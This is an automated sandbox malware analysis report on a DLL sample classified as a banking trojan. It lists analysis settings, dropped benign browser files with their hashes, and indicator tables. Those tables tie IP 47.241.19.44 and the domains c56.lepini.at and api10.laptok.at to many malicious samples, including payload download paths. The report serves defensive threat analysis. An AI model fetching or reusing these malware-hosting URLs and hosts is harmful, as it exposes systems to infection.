                                                                                                                                      192.168.2.1

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                      Analysis ID:322295
                                                                                                                                      Start date:24.11.2020
                                                                                                                                      Start time:21:18:13
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 13m 36s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:light
                                                                                                                                      Sample file name:onerous.tar.dll
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:2
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • HDC enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.bank.troj.evad.winDLL@25/54@4/2
                                                                                                                                      EGA Information:Failed
                                                                                                                                      HDC Information:
                                                                                                                                      • Successful, ratio: 5% (good quality ratio 4.7%)
                                                                                                                                      • Quality average: 77.5%
                                                                                                                                      • Quality standard deviation: 28.3%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 86%
                                                                                                                                      • Number of executed functions: 0
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Adjust boot time
                                                                                                                                      • Enable AMSI
                                                                                                                                      • Found application associated with file extension: .dll
                                                                                                                                      Warnings:
                                                                                                                                      Show All
                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
                                                                                                                                      • TCP Packets have been reduced to 100
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 104.108.39.131, 51.104.144.132, 2.18.68.82, 20.54.26.129, 152.199.19.161, 51.103.5.159, 92.122.213.194, 92.122.213.247
                                                                                                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, par02p.wns.notify.windows.com.akadns.net, go.microsoft.com, emea1.notify.windows.com.akadns.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      21:20:19API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                                                      21:20:44API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      47.241.19.440xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      22.dllGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • c56.lepini.at/jvassets/xI/t64.dat
                                                                                                                                      4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico
                                                                                                                                      0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                      • api10.laptok.at/favicon.ico

                                                                                                                                      Domains

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      api10.laptok.at0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      22.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      mRT14x9OHyME.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      4N9Gt68V5bB5.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      34UO9lvsKWLW.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      csye1F5W042k.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0cJWsqWE2WRJ.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      c56.lepini.at0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      2200.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0RLNavifGxAL.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1ImYNi1n8qsm.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      http://c56.lepini.atGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44

                                                                                                                                      ASN

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                      CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      http://qaht.midlidl.com/indexGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      https://bit.ly/3nLKwPuGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      Response_to_Motion_to_Vacate.docGet hashmaliciousBrowse
                                                                                                                                      • 47.254.169.80
                                                                                                                                      https://bit.ly/2UR10cFGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bit.ly/3lYk4BxGet hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bouncy-alpine-yam.glitch.me/#j.dutheil@dagimport.comGet hashmaliciousBrowse
                                                                                                                                      • 47.254.218.25
                                                                                                                                      0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                                                                                      • 8.208.98.199
                                                                                                                                      videorepair_setup_full6715.exeGet hashmaliciousBrowse
                                                                                                                                      • 47.91.67.36
                                                                                                                                      http://banchio.com/common/imgbrowser/update/index.phpGet hashmaliciousBrowse
                                                                                                                                      • 47.241.0.4
                                                                                                                                      earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      a7APrVP2o2vA.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44
                                                                                                                                      03QKtPTOQpA1.vbsGet hashmaliciousBrowse
                                                                                                                                      • 47.241.19.44

                                                                                                                                      JA3 Fingerprints

                                                                                                                                      No context

                                                                                                                                      Dropped Files

                                                                                                                                      No context

                                                                                                                                      Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C152A98E-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7738811488176964
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:rHZMZ928cx9W8pLdt8pDpf8phANM8pGf827B:rHZMZ928cx9W8vt8Fpf8vANM8Yf8YB
                                                                                                                                      MD5:A3C986346E381979C8B7FF0E295E4A1C
                                                                                                                                      SHA1:E0C81809FAB44BA2F42D1BD0385210480A21747D
                                                                                                                                      SHA-256:F5360641C2C41DF8CB888BEA48789AACE3A6E0EB5E17AE74431EE61EE4121098
                                                                                                                                      SHA-512:7CAA977208364696DA94E56DED347DE330491EC529F0E41AF9717C431ED2EDB832268693761B9CEB2C91E7A30A377FF10891B87F4CB74209515935BB56D1BA4C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DC6A3E1D-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):71272
                                                                                                                                      Entropy (8bit):2.0467308111060736
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rlZyZI299WRZtDfO1Mh3GtesD+tt6KmseKkSVOSGOCSmsiBhVtiv1mw1VrizY1hU:rruf9URLjzFGHaROKiDiRizpMzg
                                                                                                                                      MD5:27CB7067349AD628F3167C98BE8BA56E
                                                                                                                                      SHA1:67A8CBE516489D9A23666BB973040CA03FAD967C
                                                                                                                                      SHA-256:523D34792AB0EA3E62C208306C40EB049E011004AB7ACE7044119938002D4940
                                                                                                                                      SHA-512:E3DC29904BAB3F2D70906DD20D4BB327B9889933609224910B8083464A5F28A1E3B591F9E87EF78A9FDC7733D887598C7DB8D49B7438567C413B62E648A89736
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27592
                                                                                                                                      Entropy (8bit):1.9191146948002127
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rrZBiQkz623kIFj52skWOMuYBvqtlvqLgA:r9J3bIhIYnuIvWvA
                                                                                                                                      MD5:C0D309DF982E079C8D13B71F3742CDE8
                                                                                                                                      SHA1:3C0C8B011F7D3A9FA4A918993249212EE98A2423
                                                                                                                                      SHA-256:FB865E3D5572506172E428FF5C8181FEB5F7E5F691E4D34E9039FE0679C389C7
                                                                                                                                      SHA-512:4640038DD51D3FA19EDD5B646B28F46347FCB0812FB581850045D7EF4D362072CB8979925BAEED373A28C87FE5049CFA8426D043312BB7F4BD9C1704FA81B3A1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):27600
                                                                                                                                      Entropy (8bit):1.9187028135850674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rJZeQe6gkAFj520kWhMUY5INbW1I92NbfoA:r/bptAhIg6UwabO5bj
                                                                                                                                      MD5:33231CC9EC2C9C3202D8F3B8BBAC1B9E
                                                                                                                                      SHA1:E6147AEC076FB9CC8BB3B211B31F3FC2D823E670
                                                                                                                                      SHA-256:535C6F8B2D99A2344A1E6103C675F9A4B3A60E6F443B0FA8335887837A347631
                                                                                                                                      SHA-512:B840E17D440272F44B27FA64295E680F912E3EE3D5B6E16C5B39B350CA37C2DBEE9A25ED75E8DEE61C92A437863B6EA5E06C2AC5660D108653B5C32AA0087DE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28692
                                                                                                                                      Entropy (8bit):1.9204507076447392
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rBXZiQHz6NkEFjB2ckWXM+Ylw3DlDNb1E3DlDNJr:rBJPHW2EhwI8+Mw35HE357
                                                                                                                                      MD5:6F4D8329020DDEA4354B398FF20C7AAE
                                                                                                                                      SHA1:5BEF65ED9DD663598B49B2B8F730C056E48333C8
                                                                                                                                      SHA-256:93F57556211625DF04ABAC6D2EA6A1C267D8B02ECA56401612B13FF88D86D342
                                                                                                                                      SHA-512:7A0377926FB4764816F6B09F03C6CA046D1E8B19796DC8B17E8004B49B822B4FBE5EA482C7FF0DDC21D1BC6F5AD4A8A3878662863CCC21E4563910AB6436A4C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28140
                                                                                                                                      Entropy (8bit):1.9188053866160313
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rAZLQH6dkWFjf2ukWVMwYNfYJwlfaYJX14A:rwkaGWhOKWwEgKxt1b
                                                                                                                                      MD5:E5DECC73807B0E0B79C71BACA4C7DB4B
                                                                                                                                      SHA1:DAA38D791EB71D2F9B44C59915522C46816C92BA
                                                                                                                                      SHA-256:0950B5299958686489E3F258393C6AB71E732D7BE3C4FF041592E3BFD52B5694
                                                                                                                                      SHA-512:C5ADB7661E65EA01343BDA5D49D7A77D784FC639D2C1E190989180EA9F03EF41765C181AC894BB613A7542E0AE45DC1883A80988938D7B2A9445749C65E9EDA9
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.077401580149026
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxOE0KdWpKdWX4nWimI002EtM3MHdNMNxOE0KdWpKdWX4nWimI00ObVbkt:2d6NxO+fK4SZHKd6NxO+fK4SZ76b
                                                                                                                                      MD5:1BE4A1F7F451CEEBE27D331E3F75EB62
                                                                                                                                      SHA1:30BD0677580A78C32576AED6973579E27BB3439F
                                                                                                                                      SHA-256:F313CA1F1598B33E2116F6DB66C205BFF45876EB41BBB53653E8C4E063DFF943
                                                                                                                                      SHA-512:E0337672D9644879ED87AA7592333F0F8EC0507587EB955A803FFD331E62F16BC9D671B8BC58B95954807DD1CA558F518A96AB3AF5907E563D83E7C724BE9DBE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):653
                                                                                                                                      Entropy (8bit):5.093006023686203
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxe2ksDlxDlX4nWimI002EtM3MHdNMNxe2ksDlxDlX4nWimI00Obkak6Es:2d6Nxrp4SZHKd6Nxrp4SZ7Aa7b
                                                                                                                                      MD5:8BA10CB684BCA2596B80CDF6672B8AED
                                                                                                                                      SHA1:E18BD4F47888E0B4E89B5A45FF4ED5A87C1C26D5
                                                                                                                                      SHA-256:04065D56E43CD36AA4E36B26061C33D534291B08879915E12D467328A8E06643
                                                                                                                                      SHA-512:E8CE02D03D868CA8DA4B9555F3A336C5484B7D309E17CE9160767753023342ABC799942F058CC2CB07BD37BA07879138B91D6EFBF7A5F7B057880B74B149BB99
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x989ce7de,0x01d6c2ea</date><accdate>0x989ce7de,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):662
                                                                                                                                      Entropy (8bit):5.122194032135596
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxvL02Tp2TX4nWimI002EtM3MHdNMNxvL02Tp2TX4nWimI00ObmZEtMb:2d6NxvQ4SZHKd6NxvQ4SZ7mb
                                                                                                                                      MD5:7CA8697F7CC6EB2AE1AD1DCDEFE99E45
                                                                                                                                      SHA1:FE5A3DC46C2A5F559D395DF4A0E6D6140ED664E6
                                                                                                                                      SHA-256:8ADD093CCA9896A3CCD685494F209190B74DC4E66288CF2A2E2AE0E57D8C76D6
                                                                                                                                      SHA-512:63D1EF3DAC54A8D9D91E02C3DF271287DADD92828DD2BDCC28F52F4E3517F14F50462EDE89419D90D677606179E49F49D14D434AF7DE8DC9802D94F2CAADBB7A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):647
                                                                                                                                      Entropy (8bit):5.087026282289658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxi0OpOX4nWimI002EtM3MHdNMNxi0OpOX4nWimI00Obd5EtMb:2d6Nxh4SZHKd6Nxh4SZ7Jjb
                                                                                                                                      MD5:E94C54A3D22944401298F92C5A9D0942
                                                                                                                                      SHA1:7F64BAAE56143B754270302263834AF185A92FBF
                                                                                                                                      SHA-256:620A689C180141218B225E5F23631CAD9435B50797B2D5CAC945AC1C4A404E29
                                                                                                                                      SHA-512:46E8F47A87D5F1275AF14672C277BE9D69870D55DC9DB5B458C324CFB9522A407A72DEA6608E1CFA8A61A8F6712A2B7916E9E0A7848CA04924AC1E9F54A9FE70
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x98a1ac82,0x01d6c2ea</date><accdate>0x98a1ac82,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):656
                                                                                                                                      Entropy (8bit):5.13628902919673
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TMHdNMNxhGw02Tp2TX4nWimI002EtM3MHdNMNxhGw02Tp2TX4nWimI00Ob8K075t:2d6NxQP4SZHKd6NxQP4SZ7YKajb
                                                                                                                                      MD5:22A263B499DB5D19998731111CA9B90D
                                                                                                                                      SHA1:9EC32CAB0B18DC969117CE0D2F0D6363566E8565
                                                                                                                                      SHA-256:819997C6EE7A94F7A998BFC8DBA2FED8AF1B99F8A28627EFC98240852AF257B8
                                                                                                                                      SHA-512:968FC394F7C031CC69242270017636DE8273084EB7F7C0E330F35854BAD2D822472F0E94C255FD9E5A168805F55599668ADAB14E4FAF1BF677AC4FBA1E33D335
                                                                                                                                      Malicious:false
